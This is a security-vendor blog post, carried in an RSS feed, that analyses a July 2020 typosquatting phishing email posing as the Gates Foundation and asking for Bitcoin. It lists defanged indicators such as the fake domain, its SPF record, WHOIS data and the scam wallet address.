            <content:encoded><![CDATA[ <p><i>This blog originally appeared in July 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Each day, hundreds of thousands of new domains are registered by users around the world. Unfortunately, the simplicity of <a href="https://www.cloudflare.com/products/registrar/">domain registration</a> makes it easy for attackers to register fraudulent domains for use in phishing campaigns. In fact, according to ICANN, nearly 5.45% of newly registered domains per day are malicious (including phishing, botnets, and malware). This means there are 25,070 newly registered malicious domains per day on average.</p><p>On July 16th, 2020, an email appearing to be from the Bill &amp; Melinda Gates Foundation was sent to numerous recipients, seeking donations for the Foundation in Bitcoin. The email enticed potential donors by offering to double any donations received within seven days. The sender domain of the email was strikingly similar to the legitimate foundation’s domain, gatesfoundation.org.</p><p><b>Aside from one letter, the malicious sender domain could easily pass for one belonging to the Gates Foundation.</b> The attacker cleverly employed <a href="https://www.cloudflare.com/learning/dns/what-is-cybersquatting/">typosquatting</a> when creating the domain name, just minutes before sending the email. Without close scrutiny, the domain’s typo is indistinguishable from the legitimate domain. The attacker also set up an SPF record for the domain in order to ensure reliable delivery of their attack. Interestingly, this phish was sent just a day after Bill Gates’ Twitter account was hacked and used to tweet a message nearly identical to this email.</p>
            <pre><code>Benign Domain: gatesfoundation.org
Malicious Domain: gatesfoundatlon[.]com
Malicious Domain Age: 2020-07-16 17:00:54 +0000 UTC
SPF Record:
     gatesfoundatlon[.]com.	1759	IN	TXT	"v=spf1 include:spf.privateemail.com ~all"
Bitcoin address: 18XJzrgPqYhKKeR2j4vz6wPQorK3sNuNxs</code></pre>
            
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4DcmAJSHyYgulPzRRnPhHd/cf396f15cb6ff6500e612166dc146e35/image2-16.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Jc4dDl2jFFtw9pNOKIAzk/9883877608132754776b62ae2c0faebb/image3.jpg" />
            
            </figure>
    <div>
      <h3>Whois Record for gatesfoundatlon[.]com</h3>
      <a href="#whois-record-for-gatesfoundatlon-com">
        
      </a>
    </div>
    
            <pre><code>Domain name: gatesfoundatlon[.]com
Registry Domain ID: 2546450570_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2020-07-16T17:00:54.00Z
Registrar Registration Expiration Date: 2021-07-16T17:00:54.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code:
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext:
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Registry Admin ID:
Admin Name: WhoisGuard Protected
Admin Organization: WhoisGuard, Inc.
Admin Street: P.O. Box 0823-03411
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code:
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Registry Tech ID:
Tech Name: WhoisGuard Protected
Tech Organization: WhoisGuard, Inc.
Tech Street: P.O. Box 0823-03411
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code:
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
&gt;&gt;&gt; Last update of WHOIS database: 2020-07-15T23:22:34.80Z &lt;&lt;&lt;</code></pre>
            
    <div>
      <h3>Twitter Message From July 15, 2020:</h3>
      <a href="#twitter-message-from-july-15-2020">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/75JTu1z0KjOComkOIRQQWb/56b1c39969704ca0223a6614592b8761/image1-4.jpg" />
            
            </figure><p>Area 1 uses multiple analysis techniques that leverage insight gained from proactive web crawling and early identification of attacker campaign infrastructure, to detect and stop email from spoofed domains and accounts. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including malicious newly registered domains, that other defenses miss.</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">1DgLAgnVR6ZKm4hktSGB3q</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
    </channel>
</rss>